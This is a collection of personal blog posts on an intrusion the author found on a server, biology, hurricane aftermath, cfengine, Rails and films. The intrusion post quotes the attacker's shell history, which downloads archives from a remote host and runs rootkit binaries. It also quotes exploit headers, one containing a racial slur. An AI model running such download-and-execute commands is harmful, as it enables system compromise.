Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2

So I check what processes this user is running. I see that he is running screen, and these 'uselib24' processes. Wondering where he ran these from, I just went to /proc/PID and looked at the cwd symlink. It's linked to /var/tmp/.a. I look in there and see all sorts of rootkit exploits, one of them being this uselib24. He even has the C code uselib24.c, and it looks like:

/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
....

Let's see, what else. There is a k-rad.c. What's that look like?

/*
* k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2
* Discovered and exploit coded Jan 2005 by sd
*
* In memory of pwned.c (uselib)

And then ex_perl2b.c:

/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/

A nice collection of recent exploits. I honestly haven't been keeping up with Bugtraq. There are some other binaries with no source code. I'm able to actually 'screen -r' his session. It's running the uselib24 process, crunching away at trying to find a buffer overflow address. I wanted to use screen's scrollback buffer to get some history, but accidentally did a 'pkill -9 -u tester' in another window. So I only saw the last few things he did:

[tester@server .a]$ chmod 9x uselib24
chmod: invalid mode string: `9x'
[tester@server .a]$ chmod +x uselib24
[tester@server .a]$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 29608
child 2 VMAs 1132
child 3 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc04f97de
Wait... /

~/.bash_history shows some more:

exit
w
uname -a
/sbin/ifconfig
iptables -L
cd /var/tmp
mkdir -p .a
cd .a
wget radovis.com/images/new.tgz
tar zxvf new.tgz
chmod +x hator
wget radovis.com/images/k.zip
unzip k
chmod +x hator
./hator
chmod +x pwned
./pwned
chmod +x a
./a
chmod +x modprobe
./modprobe
./pwned
./a
screen -v
ps -x
ps -aux
screen -v
screen
screen -r
ls -al
chmod 9x uselib24
chmod +x uselib24

So you see he downloaded rootkits from http://www.radovis.com/images/.

Doesn't appear he was able to get root access. Luckily this server is being phased out anyway. Wee, the fun of finding hackers... yawn.

Bookpool is having its annual 47% off sale on O'reilly books. Go grab some.

Awhile ago I bashed this exercise machine called the ROM that touted a 4-minute workout. Reading through their site they actually have some valid points. Checkout this video of the 'device'.

Here is an excellent article on the risks of antibiotics. Some quotes:

The most disturbing is Salyers's discovery that antibiotics like tetracycline actually stimulate Bacteroides to begin swapping its resistance genes. "If you think of the conjugative transfer of resistance genes as bacterial sex, you have to think of tetracycline as the aphrodisiac," she says.

Also amazing is how much bacteria can actually affect fat storage:

Fredrik Backhed ... has caught B. theta sending biochemical messages to host cells in the abdomen, directing them to store fat. When he gave germ-free mice an infusion of gut bacteria from a conventionally raised mouse, they immediately put on an average of 50 percent more fat although they were consuming 30 percent less food than when they were germ-free. "It's as if B. theta is telling its host, 'save this--we may need it later' ...

So this past week or so I've been pretty bored. With school out it is rather lame. I decided to torture myself further and try hacking again at making an IMAP interface to Gmail.

I didn't really get much further along, but I did manage to get it working with Thunderbird:

I don't really recommend using this at all. It's more of a proof of concept and something to keep me busy. The code is absolutely horrible. It fetches ALL mail from your Gmail inbox at startup no matter what. I found that the hardest thing for me to do and what took the most time (and probably is buggy as hell) was trying to parse a string such as:

a0004 FETCH 1:1 (UID FLAGS INTERNALDATE RFC822.SIZE BODY.PEEK[HEADER.FIELDS (DATE FROM SUBJECT TO CC MESSAGE-ID REFERENCES CONTENT-TYPE IN-REPLY-TO REPLY-TO LINES X-LABEL)])

The parentheses and brackets can be nested, so above might also have '.. FLAGS (\Seen) ..' etc. That's what makes this difficult. I'd appreciate any algorithms . I also got to see how the various IMAP clients work. I found that mutt is the cleanest IMAP client. I could not get it working with Apple Mail and may try again later. I probably spent more time looking at tcpdumps when sane people would look at the IMAP RFC . Go here if you are feeling brave. Don't blame me if you lose all your mail. I don't see how that can happen, but you've been warned.

Apache has an interesting option for mass virtual hosting. The problem is in the way that logfiles are dealt with. You can't have separate logfiles for each virtual host, and they recommend using a log processing script to separate them. What is also rather lame is you cannot split up error logs no matter what. It's rather silly that this module is for 'mass' hosting and yet they expect users to want all of the error logs in one file that cannot be linked to a virtual host.

Anyhow, cronolog doesn't support virtual host info in the access log, so I figured I would try to write my own script that would do what I need. I didn't know how much it would involve, but surprisingly very little, and there begat pythonolog . I got most of cronolog's functionality in a very few lines of code. It's definitely not as efficient though. It would be used basically like this:

LogFormat "%V %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
CustomLog "|/path/to/pythonolog.py /my/logs/%Y/%m-%d-%VHOST-access_log" combined

It accepts all the standard strftime formats, as well as %VHOST which would be the virtual host (first field on line). I made it so that a configurable maximum number of logfiles stay open. When that limit is reached, old logs that haven't been written to in awhile are closed. This keeps the file descriptor count reasonable.

Go grab it here if interested. I honestly haven't even tested it yet so good luck heh.

Some interesting pages provided by FPL:

• Outage number by county
• Outage maps by county

The outage maps are especially interesting.

Well things are somewhat improving here, but it's dangerous to drive. Many major intersections have no traffic lights. Going through these intersections is not fun. With so many trees blown down it looks like a wasteland outside. Power is still out to many areas, and the lines to gas stations are huge. I am only driving minimally, and have about a half tank of gas left. Cabin fever is setting in. I saw 'The Shining' last night, but I am not at the Jack Torrance stage yet. What an amazing movie btw, it's such a masterpiece of filmmaking. It played on A&E and what kinda sucked is it ran from 8 to 11:30pm with commercials!

Speaking of commercials, I am really appalled at the number of prescription medicine commercials on television. It is really getting out of hand. I think I saw at least one for every commercial break on A&E between 8 and 11:30pm. I also see a new tactic in these ads. In the past there were always disclaimers saying you may vomit, get an erection for 8 hours, die, etc. Now they are almost gone, and instead they show some text in the commercial such as 'See our ad in Health magazine.' I am not sure, but it seems to me they are exploiting a loophole to not mention any side effects during the commercial.

Here is an interesting critique by a doctor on the med business. Sorry I think you need a subscription to Discover to read this. A quote:

These ads drive a wedge between doctor and patient. For a while, I was both a family practitioner and a researcher, and I knew as much about the real data behind Vioxx and Celebrex as anybody. I knew they were neither safer nor more effective than the much less expensive alternatives and would tell my patients so. Nonetheless, many still demanded these drugs, which shows the tremendous power of marketing.

If you don't believe your doctor, I feel sorry for you. It's a shame that someone can think themselves more knowledgeable on medicine after watching a 30-second commercial. Is 30 seconds going to outweigh 8+ years of education that a doctor goes through to become a doctor? What's also very sad from that article:

Drug companies are also sponsoring about 70 percent of the continuing education that doctors are required to participate in to keep their licenses to practice.

I had a strange dream last night about viruses. Not the computer kind, but biological. First a little background.

Viruses are essentially proteins. The ones that the body can fight have antigens, which are identifiers that the body recognizes as non-self. The body generates antibodies that 'fit' and bind to these identifiers and render the virus, and protein, inactive. Vaccines are created by introducing a version of the virus that may be biologically inactive or not powerful enough to cause major damage, or even something that may resemble the real virus. The body can then make the antibodies that will later take care of a real threat. Of course this does not work for the viruses that mutate and therfore make the existing antibodies useless.

I had a wierd dream about a virus that depended on antibodies for survival. That is, it required the body to attack it in order for it to succeed. It was like a virus encased in a shell of proteins that the body does recognize as non-self, and therefore attacks. But attacking it actually opened the shell and let the real virus out, which was not recognizable by the host and did not have antigens. It was sort of like flack deployed by the virus in order to trick the immune system, but it actually depended on the immune system to spread.

I'm not sure if there is such a virus. In my dream the word 'diablo' kept coming up for some reason, heh. No idea why. I just thought I would blog this in case it came in useful later.

When we think of the phrase 'survival of the fittest' and natural selection, we usually think of it in terms of animals or live organisms in general. But it goes deeper than that. Here's a great excerpt from Lehninger's Biochemistry book (written in 1975 no less):

Why should living organisms have selected the specific types of organic molecules they now possess? Why should 20 alpha-amino acids be the building blocks of all proteins in all organisms? Why not only 10? Why not 40? Why are they all alpha-amino acids? Couldn't we equally well construct large "protein" molecules from amino acids having their amino groups in the beta positions? Why are the purines adenine and guanine and the pyrimidines cytosine and thymine, out of the dozens of purine and pyrimidine derivatives known, the essential building blocks of DNA in all species? Much evidence supports the concept that the biomolecules we know today were selected from a much larger number of available organic compounds. Actually, several hundred different organic compounds have been isolated from simulated primitive-earth experiments on the abiotic origin of organic molecules like those described above. Since only a small number of different organic compounds may have been required to form the earliest biostructures capable of survival, it appears very likely that a process of selection took place.

Think about the formation of the first 'cell', the beginnings of life. The right molecules had to come together in the right way to create the cell membrane that separates a self from a non-self. Think of how many trials and errors were made throughout evolutionary history before that first cell evolved, how many molecules tested and deemed unfit to do the job.

Evolution is a theory that not only applies to the ape-to-human transformation which seems to be its most visible controversy, but also applies to the abiotic to biotic transformation as well, of inanimate to animate from an atomic and molecular standpoint. The theory of evolution ultimately says that you have come from that which is not living.

It's amazing to think about this. Was it just luck that the right combination of molecules came together after millions of years, maybe with that spark of lightning, and there began life as we know it? The idea of God always comes into this debate. There is a guy named Richard Dawkins that basically lashes out at scientists that believe in God. He simply says they are idiots and not true scientists. The recent Discover magazine has readers writing in defending him, as well as denouncing him.

In some ways I agree with the evolutionary perspective. I believe there is too much evidence to deny that we evolved from lower animals. I think that a person who denies this, denies science, medicine, and all things that such fields depend on. Just from a genetic standpoint it is hard to prove that we are not related in some way to apes.

But does that mean I must not believe in God? No. It means that I don't believe there is a God that has created us in his own image. I don't believe there is a way for science to prove the existence of God, and neither is there a way to disprove existence. There is no way to even disprove God's nonexistence. If you say evolution created us, fine. So who created evolution? What created that first cell, and why? Or go back even further, why was our universe created? These questions just cannot be answered by science.

I wouldn't even say that I am agnostic. Because there are certain things that happen in life that I believe are through some sort of divine hand. There is a feeling, and a faith in something, but I just do not know what, and I may never know. Just think of all the great things faith has achieved (even in science). I think we would not have excelled so far without that faith in a higher being. Science is definitely not my God. But neither is the human form divine. I believe there is a creator of the universe, and it is something that I most likely cannot even begin to comprehend. But I believe it is there nonetheless, waiting for me to believe.

Allright, maybe some of you are wondering how things are going with the storm. I've been out of power for the past few days and didn't have any internet access. Pretty much all of my area was out of power, so no internet cafes either. It's rather dangerous on the roads too, because all traffic lights are either gone, broken, or powerless. To top that, it's very difficult to find gas due to most gas stations not having generators and not able to function without power.

I'm pretty grateful we got power back so soon, as I've been hearing on the radio that it could take up to 4 weeks. I believe there are many areas still out.

So let's see, where to begin. I stay in a townhouse that really didn't get any damage. Outside is a mess though. Huge trees have been toppled over, and when they do you can see the roots spread out like a pancake. It shows that those trees have little foundation in the ground, and the roots grow horizontal rather than vertical. But most of the palm trees stayed up, and I believe those roots grow deep. The ones that did go down mostly broke in half. Maybe I did learn something from my Biodiversity class and all that plant bullshit .

The trees are all mangled with the power lines. The next few days with no power is when the cabin fever sets in. Everyone comes outside. I saw a mom and her two children riding bikes with helmets. There was a downed power line and they just strolled right over it. I thought that was very funny to make your child wear a helmet for safety and then casually ride over a powerline. If there is any good that came out of this it's getting people out of their house. I think that we rely too much on television for entertainment, and while I walked outside it was nice to see kids actually playing in the lawn among the down trees. Nights were completely pitch black, and starlight the only source of light. The brightest thing in my room was my breathing Powerbook light which was trying to get those last few gasps of breath before suffocation.

It was nice to hear the sound of nature outside. Wait, those aren't insects, that's the strange harmonics of 4 or 5 generators running! So much for nature..

My fridge needs to be emptied. I'd venture to say that there must be alot of Americans that gain weight after a hurricane or power outage, a 'hurricane weight gain'. That's when you have to eat all the food before it spoils, and it's mostly junk food. I tried to exercise daily though just to keep in shape. Cold showers were not fun either. I found that the best way to take a cold shower is to exercise right before, so you get warmed up. I heard a lady on the radio come up with an interesting method of taking a hot shower. She unrolled her garden hose filled with water on the lawn during the day for a few hours. The water in the hose became very warm, and she used it to shower.

One thing that really bothered me was the appalling cell phone service. In my case it was Cingular, but I heard many others sucked as well. My home phone was dead too.

But things are sort of coming back to normal now. It was a fun ride, and I know people had it much worse. I'm grateful I had a place to stay, food to eat, water, etc.

Here is probably the closest equivalent to Rails for Python. What's very interesting is the 20-min demo on their site that shows how to create a wiki from scratch with TurboGears. It's definitely not as elegant as Rails, but it's still cool if you want to stay with Python. That programmer in the demo is pretty impressive, though he's probably had lots of experience with TurboGears.

I was thinking of seeing North Country or Capote this weekend, but as usual ended up seeing something else. I don't know, I think I wanted to see a movie that required little 'thought', so that narrowed down to Doom or Stay. I decided on Stay because it sounded like it had some cool cinematography and Doom got horrible reviews.

So how was Stay? The only way I can review it is by spoiling it, so here there be spoilers...

Let's see, how can I describe this movie... think The Sixth Sense crossed with The Usual Suspects, only not as good, and no 'The' in the title. It's OK, and interesting at times. Basically, it is one director's vision of what the last few moments of death must be like. Scientifically, I would agree that this is probably a very good hypothesis of what the brain does at the time of death. The mind seeks to resolve all that it could not resolve in life, so that it may rest forever. Ultimately the person wants to be forgiven, and that was the running theme of this movie.

I had seen Ryan Gosling in The Believer, which was an absolutely amazing true story about a Jew who hates himself so much that he joins the KKK. In this movie again he is fighting internal demons. Guilt and conscience is a bitch.

I'll save you 1 hour and 48 minutes: the whole movie is a dream, a fabrication based on people the main character sees around him during his last few minutes of life. I found it really interesting because you can tell that the mind works in this way sometimes. You create your own drama, and stories that are far from reality. In such a panic situation, it is conceivable that your mind would take this to the extreme.

Probably the coolest thing about this movie (and the main reason I went to see it), was the cinematography. It's conveyed just like a dream, with transitions between scenes happening as they occur in dreams. There are strange ticks and nonsensical things, like people swapping places in a scene as they walk behind a pillar. They are subtle, but you notice them. Another scene had triplets of everything throughout the scene, but I could not figure out why. The director did a very good job conveying the near-death experience. But it's rather pretentious, and too moralistic. I'm just glad that the main character did in fact die, and it did not end with some Hollywood crap.

Go see it if you're interested in this stuff and effects, other than that might want to wait until it comes on cable.

So I'm reading through a really good Rails programming book. I'll be installing it for a client so I figure the more I know about the language the better.

The book says to create a new scaffold for its first sample application with the command:

ruby script/generate scaffold Product Admin

And as usual I am lucky enough to have problems at this stage. That's supposed to give me a web page I can use to view a MySQL shopping cart. But whenever I went to the URL I would get a 'Recognition failed' error. Not knowing anything about Ruby or Rails, I had no clue what this meant, so I'm searching logfiles, wondering whether there is a problem with my database setup, etc.

Searching on google led to an errata page for the Agile programming book, which seemed to indicate this issue. Of course the site has to be down and the google cache useless so I get nothing out of this.

After doing some reading, I found out that the above command is supposed to create an Admin controller of type Product. But it wasn't doing that, and instead creating a 'products' controller and ignoring the Admin argument altogether. So the recognition failed message means it couldn't find the controller. After about 30 min of searching the web, it turns out I came across a bug that was fixed 10 hours ago.

I was using rails version 0.14.1, which has this problem, and it's suggested to go down to 0.13 or the development code. After going to 0.13.1 (via 'gem install rails --version 0.13.1'), and removing the new version, things worked ok. Ahh the joys of version hell. Don't get me wrong, Rails looks very cool, but these type of issues remind me of all the problems associated with Java versions. I understand Rails is under heavy development, and I should probably stick to older versions. But with things such as 'gem install rails' installing something broken, how could I know?

Oh well, I got this working and will continue my Rails adventure later.

I thought it was interesting to find out that polio affected the rich people more than the poor. It has to do with how the disease is transmitted and immunity.

As kids grew up in poor conditions, they came in contact with feces that spread polio. However, at a young age, the body can develop an immunity to the disease. In contrast, the rich kids were 'cleaner' and were never exposed to the virus. This cleanliness led them to be more susceptible to the disease, and the poor unknowingly vaccinated themselves.

So there is something to be said of living in dirty or rough conditions. Your body may be tougher to certain pathogens.

I heard recently in the news the story about anti-bacterial soap being bad for you. Normal soap works by binding to bacteria and it being physically scrubbed off. Anti-bacterial soap works differently, by interfering with bacterial growth itself and killing the bacteria. So what's the problem? Bacteria are great and coming up with resistance. So there is fear that we are actually making the bacteria on us stronger by using such soaps.

Here's a great blog written by a doctor doing his residency. He's always got some interesting stories on there.

My college has a 'Lifelong Learning' school which is mainly for elderly wanting to learn new things and exercise their brain. The brain really falls into the category of 'use it or lose it', so I think it's great to see people wanting to learn. It can only be beneficial to your health and mind. I've always felt that if I'm not learning anything new, my life seems sort of at a standstill, like I'm not going anywhere. I think academia is really where I should be, and who knows, maybe I will end up in a research or teaching hospital.

I came across The Teaching Company, which gets good professors to teach courses in an overview/introductory format on DVD. You're not going to get a medical degree watching these, but it's great to spark your interest and provides good general knowledge. I'm watching the Anatomy lecture series, which consists of 32 45-minute lectures. They have courses in many different topics, so go check them out. Some are rather expensive, but sometimes they have sales in which there are reasonable prices.

When fertilization occurs in humans, the cell growth of the zygote is called indeterminate radial cleavage. The interesting part of this is 'indeterminate'. What this means is if you take a piece of that growing ball of cells off, and implant it into the uterus, it will grow into another human. That's how identical twins are formed, and is nature's cloning technique. It's called indeterminate cleavage because the cells are not specialized and are not 'determined' to be certain tissues until later in development.

What I wonder is, let's say you take a piece of the growing cells, to start another growth of cells (a twin). Then you take a part of the twin cell, and then a part of the part you take off, etc recursively. Since the cells do not have time to specialize, can you essentially create an unlimited number of humans (i.e. clones) from that one fertized egg? It's almost like you are creating more life without fertilization: parthenogenesis. We are already moving towards creating artificial uteruses, so can you imagine the impact of being able to 'grow' humans like this?

7th Day Adventist - He who plays with his toys on Saturday, loses.

Agnosticism - It is not possible to know whether toys make a bit of difference.

Amish - Toys with batteries are surely a sin.

Anglican - They were our toys first.

Atheism - There is no toy maker.

B'Hai - All toys are just fine with us.

Baptist - Once played, always played.

Branch Davidians - He who dies playing with the biggest toys, wins.

Capitalism - He who dies with the most toys, wins.

Catholicism - He who denies himself the most toys, wins.

Church of Christ - He whose toys make music, loses.

Church of Christ, Scientist - We are the toys.

Communism - Everyone gets the same number of toys, and you go straight to hell if we catch you selling yours.

Confucianism - Once a toy is dipped in the water, it is no longer dry.

Evolutionism - The toys made themselves.

Existentialism - Toys are a figment of your imagination.

Greek Orthodox - No, they were OURS first.

Hari Krishna - He who plays with the most toys, wins.

Hedonism - To heck with the rule book!? Let's play!

Hinduism - He who plays with bags of plastic farm animals, loses.

Jehovah's Witnesses - He who sells the most toys door-to-door, wins.

Mormonism - Every boy can have as many toys as he wants.

Non-denomination - just play with them.

Pentecostalism - He whose toys can talk, wins.

Polytheism - There are many toy makers.

Taoism - The doll is as important as the dumptruck.

Voodoo - Let me borrow that doll for a second.

----------------------

He Who Dies With The Most Toys - still dies..

Well now I'm getting trackback spam, so I'm disabling trackbacks...

It's interesting how my Anatomy & Physiology book inserts some sly humor every once in awhile:

We have special names for bursitis at other locations, indicating the occupations most often associated with them. In "housemaid's knee," which accompanies prolonged kneeling, the affected bursa (fluid-filled pocket in connective tissue) lies between the patella and the skin. The condition of "student's elbow" is a form of bursitis that can result from propping your head up with your arm on a desk while you read your anatomy and physiology textbook.

It's wierd, I always have a tendency to find problems in programs. And problems that to me should have been found a long time ago. I should have been a QA person.

I was playing with the latest release of cfengine (2.1.16) and came across a problem dealing with ordering of the configuration. Basically, you can have one operation, say installing a new /etc/ssh/sshd_config file, then trigger another, like restarting sshd, via a 'define' statement. These define classes in existence so that another place in the configuration can check for it. So let's say I have a copy command:

copy:
        $(dist_dir)/sshd_config dest=/etc/ssh/sshd_config
                mode=644
                owner=root
                group=root
                server=$(policyhost)
                type=checksum
                define=sshd_reload

Notice the define of sshd_reload. Then I have a shellcommands clause:

shellcommands:
        sshd_reload::
                "/sbin/service sshd reload"

If I were to put this clause clause above the 'copy:', it would not be executed, because it would be 'too late'. Making things more complex is I have to designate the proper order in an 'actionsequence' option. Ordering becomes important and tricky when the configuration gets complex. There is an 'AddInstallable' option which is pretty much like function prototyping in C, where it would give cfengine a hint that sshd_reload may be defined by something and sections may need multiple passes in order to catch that. That's great in theory, but it just doesn't work in 2.1.16.

So off goes my message to the mailing list and the developer tells me to use the latest subversion tree. Yippee, alpha code of software I don't even understand on production servers . It fixed this problem, but brought out some others. First, the 'tidy' operation, which is used to delete files, seems to function differently in how it handles wildcards. The new code also seemed to have some debug statements which was making it noisy and emailing me crap. I had to go in and edit the code to remove them.

I don't know, whenever I run such development code, it's rather scary as I don't know what's broken. Oh well who gives a shit. What was rather neat is I was able to use cfengine to update cfengine itself .

I've been spending some time setting up cfengine and attempting its methodology. Essentially the idea is to keep centralized configuration for all servers and describing the 'state' each machine should be in. Cfengine works by making each system gradually approach the desired state, which may not be immediate.

One thing interesting about cfengine is it prefers not to notify you of system changes, but rather just perform the change and be quiet. For example, say /usr/java/bin should be mode 755. When cfengine notices that it isn't the right mode, it will fix it, but won't notify you unless you specifically request it. That may sound strange, but think about having a large amount of systems. The idea of looking through logcheck emails for each server is not a very good use of your time. In fact I hate getting emails from servers. They should be quiet already, always complaining.

cfengine setup is not for the weak hearted. You will have to read lots of documentation before even attempting to set it up. I still don't understand alot of it, and setting up the authentication between servers is really more work than it should be. But once it's setup it is rather cool. You have alot of freedom as to how to use the system. For example, say I have a custom /etc/ssh/sshd_config I want distributed to my servers. You could put the file on the cfengine server, and all the clients checksum it to see if any differences. If there are, it's copied over, and then sshd is restarted. Or you can instead set it up to edit the sshd_config file directly via stepwise text-editing commands. This sort of logic is all done with cfengine. I prefer the former to the latter, because I've already run into a situation where my text-editing logic was wrong and the file was being changed every time cfengine would run .

cfengine runs periodically on the clients to 'check' everything to see if it is in the right state utilizing a 'pull' strategy. If there are lots of things to check, it is very IO intensive. You can also use 'cfrun' to forcefully run the check on remote systems, utilizing a 'push' strategy.

One thing I don't really understand how to properly do is package management. cfengine has hooks for RPM, to check whether a version of a package is installed, and if not to do something about it (call up2date, your own script, etc). However it's rather convoluted and difficult to get done properly. You still need to setup your own RPM repository and such, and for basic updates it works ok.

Ideally your final cfengine configuration should be able to be applied to a fresh system, in order to bring it up to the proper state of the other servers. That's cool and all, but is hard to test unless you have free servers laying around. I'm doing this on production systems, but the client I am doing this for will be getting more servers. That will be a good test for cfengine. When designing the configuration, you have to keep this in mind: the idea of bringing ALL systems, including new and old, to the current state. You cannot think of patching one system, but have to look at the network as a whole. It's a different way of admin, and sometimes very difficult to do properly, but I think it may be worth the effort. It can lead to a pretty much hands-off network.

After reading this excerpt in a Biochemistry book, I could not help thinking about data storage:

A second remarkable characteristic of the self-replicating property of living organisms is the extraordinary stability of the genetic information stored in DNA. Very few early historical records prepared by man have survived for long, even though they have been etched in copper or stone and preserved against the elements. The Dead Sea scrolls and the Rosetta stone, for example, are only a few thousand years old. But there is good reason to believe that modern bacteria have nearly the same size, shape, and internal structure and contain the same kinds of building-block molecules and the same kinds of enzymes as those which lived hundreds of millions of years ago, despite the fact that bacteria, like all organisms, have been undergoing constant evolutionary change. Genetic information is preserved, not on a copper scroll or engraved in stone, but in the form of DNA, an organic molecule so fragile that when isolated in solution, it will break into many pieces if the solution is merely stirred or pipetted.

I came across this article on DNA computing. An interesting quote:

The data density of DNA is impressive. Just like a string of binary data is encoded with ones and zeros, a strand of DNA is encoded with four bases, represented by the letters A, T, C, and G. The bases (also known as nucleotides) are spaced every 0.35 nanometers along the DNA molecule, giving DNA an remarkable data density of nearly 18 Mbits per inch. In two dimensions, if you assume one base per square nanometer, the data density is over one million Gbits per square inch. Compare this to the data density of a typical high performance hard drive, which is about 7 Gbits per square inch -- a factor of over 100,000 smaller.

They go through an algorithm of solving the traveling salesman problem using DNA computation. Very cool stuff.

I had planned on seeing Waiting... this weekend, but the bad reviews turned me off to it. In fact I was going to see it, but then at the last minute I decided I would see Wallace and Gromit since it got good reviews.

Now I never even saw this show before. I just remember Chicken Run which I liked, and heard this was similar. Supposedly Wallace and Gromit is some famous show in England .

Anyhow, at first the choppy clay animation was kinda annoying on the big screen, but I started liking the story. It's definitely very wierd and different from US cartoon flicks. What I learned is that this Wallace character is psychotic and Gromit is a masochist. I liked it alot.

This week and last are exam weeks for me. I got a 104% on my Anatomy & Physiology exam. I was 1 out of 2 people who got that highest score. What I found really surprising is that 70 out of 180 people failed! Most of this first exam was basic chemistry stuff so I already knew alot of it. However I guessed as to what type of molecule a 'heteroring' was heh, I guessed correctly. Our teacher gave a good sermon after finding out the grades. He made an interesting comment, "Would you want a D or F student prescribing medicine to your daughter?". And "You are better off going surfing and having a good time rather than come to class, waste money, and fail."

I got a 96% on a Biodiversity exam. I'm actually kinda peeved at that, because I changed an answer at the last moment to the wrong one. Still, I'm happy. What sucks at FAU is they require 94+ for an A. I've heard that at other schools like University of Florida, 90+ is an A. Not sure why FAU is trying to be tough.

I employed a memorizing strategy for these exams that associates wierd stories with my notes. It truly works if you put the right effort and time into it. I think I have figured out how it works. Say there is some piece of data you want to remember. You've read about it so you have some vague idea of it, i.e. you have a certain pathway in your brain to get to the data, but it's difficult to recall. Now let's say you create a story linking that data. What you've done is essentially created another pathway to that data, so now you have two ways of getting to the information you need. It works as a reinforcer of the idea, as if there are now multiple paths your mind can take in parallel. The more of these pathways you can make, by other associations like vision and other senses, the stronger the data is and the faster you can get to it.

What's wierd is I realized that even after forgetting the details of the story, I still remembered the target data. Not all of it, but certain key items. It's as if by creating those multiple pathways the data is now imprinted, and even if the original pathways don't exist, some new one is created that lets me get the information quickly. I find it pretty interesting. The hardest part in all of this is knowing WHAT to memorize. In class you take a shitload of notes and read countless chapters, but you don't know what you will be tested on. So part of this is understanding the teacher and his/her exams, how they discuss things in class, tone of voice, etc. I think it's easy to get drowned in information. You need to prune out key things that seem important. That was much more difficult when I was younger, but now it seems easier. This is probably why many of the younger people might be doing bad in class.

Tomorrow I have a chemistry exam, but chem has always been kinda easy for me. Not sure why, I don't even like chemistry that much. But the concepts just seem very natural and almost common sensical. I just cannot see myself as a chemist though. Class average for the last exam was 45%, and I got a 94.

Well this weekend I was bombarded with blog spam. It all came from dozens of IPs with random text in the comment like "interesting blog" and what not. What's interesting is the URLs they put in their spam point to other blogs, so I don't know what they are doing.

Anyhow, I'm pretty fed up with it and now I'm not allowing any URLs at all in comments, sorry. You'll have to clear the Url field on any comment posts as well.

So this afternoon I decided to take a nap at around 2pm or so, and I experienced something I've never really felt before that was just wierd. I'm lying in bed, and my laptop is next to me and I'm listening to some music. I start to become paralyzed and cannot move at all. I start feeling something tugging on my left index finger, as if someone is pulling it. Then things just started getting even wierder. I sensed a real impending doom, as if something evil were in the room. Now it was sunny and my window shades were open, but it felt like some dark shadow came in.

I still could not move, and then felt a tugging on my right leg, as if someone were trying to drag me! I was jolted and pulled to the lower part of my bed. It felt like I was dead and someone was dragging my body. Whatever it was, it was trying to pull me off of the bed. I had a sense that some ghost was trying to mess with me.

Now, I'm not much of a believer in ghosts or what not. I'm not even scared of the dark, but this was probably the scariest feeling I ever had. I never felt anything like it. I literally thought I was dead, and even felt like I was possessed or something. Then all of a sudden I could move. My laptop wasn't there and I wasn't listening to music.

What happened was when I laid down, I fell asleep without even realizing it. The transition of wakeful to sleeping was so smooth that I didn't even notice and I thought my dream was real. I guess some may refer to this as a lucid dream. It all happened within 1 hour. It got me thinking. Some patients seem to remember their surgery when under anesthesia, and maybe the pulling of my leg had something to do with my ankle surgery. Maybe subconsciously I was going back to that operating table and remembering certain things.

Anyhow, it was very scary.

I recently was playing with Checkinstall on a Redhat Enterprise Linux 3 system setup by Rackspace. Checkinstall is a pretty nice system to create your own packages/RPMs from source very easily. However I had a wierd problem that I had no clue how to fix. Whenever I ran checkinstall, I would get:

========================= Installation results ===========================
/usr/local/bin/installwatch:
/var/tmp/TGhbCPUHIWGChdBddpOX/installscript.sh: /bin/sh: bad
interpreter: Permission denied

**** Installation failed. Aborting package creation.

Bad interpreter, permission denied? After a note to the mailing list, I was pointed to this thread about installing some game Enemy Territory and a similar problem. It turns out in /etc/fstab tmp was mounted with the noexec flag, which means nothing can be executed, hence rendering checkinstall nonfunctional.

Just goes to show sometimes the problem is right in front of you and you miss it.

Computer Immunology is a strange term, but it's very interesting. I like the idea of systems being able to correct themselves. Approaching sysadmin from a research standpoint has always been interesting to me, but it's hard to link the theoretical to the practical. There are many things that need improvement in our sysadmin methodologies, and I for one welcome new techniques. As far as automation, I did write a pretty useful tool back in the day. That was when I was a Perl fanatic, and if you look at the code of that script I tried to use every Perl bell and whistle. I'm quite proud of it . Nowadays I would only do such a script in Python.

I've heard many things about cfengine, which is basically a non-standard approach to sysadmin. The idea is to keep a centralized 'configuration' for a system, with 'configuration' taking the broadest definition imaginable. It might include certain processes running (or not running), a version of Apache installed, permissions of files, etc. Essentially you update a configuration for a host, and cfengine takes care of applying that configuration to get the host up to the right state.

I read the tutorial for cfengine and I must say that's some ancient scripture. They are talking about rsh and rhosts for God's sake. Isn't this whole expert system methodology supposed to be cutting edge? If so why are we talking about /etc/hosts.equiv? Can we please come back to the cenozoic era?

I could not grasp any real-world practical examples from the docs, but there are definitely some articles and everyone seems to have a boner for this tool. From what I can understand, when cfengine runs, it analyzes the system state. This is very IO bound process, and it seems to me the more 'configuration' you have, the longer the analysis takes.

I wondered whether there are such systems written in Python, and came across a few rants about this. Long story short: no.

But Ruby, on the other hand, seems to give better results. I came across Puppet, which is purported to be a next generation cfengine. It seems to be in early development with lots of missing features that cfengine has, but it looks promising.

I'm not sure whether I'm willing to invest the time and effort to setup cfengine. Maybe I will, just to get a feel for this different sysadmin approach.

David Cronenberg is a director that can take something that we see in almost every TV show nowadays, a gunshot, and turn it into the most visceral and graphic scene imaginable. He pushes the limits on what the viewer will accept. Living in our society dulled by all the violence that pervades television, this director shows us just how disturbing death and violence really is, without actually pervading the movie with such scenes.

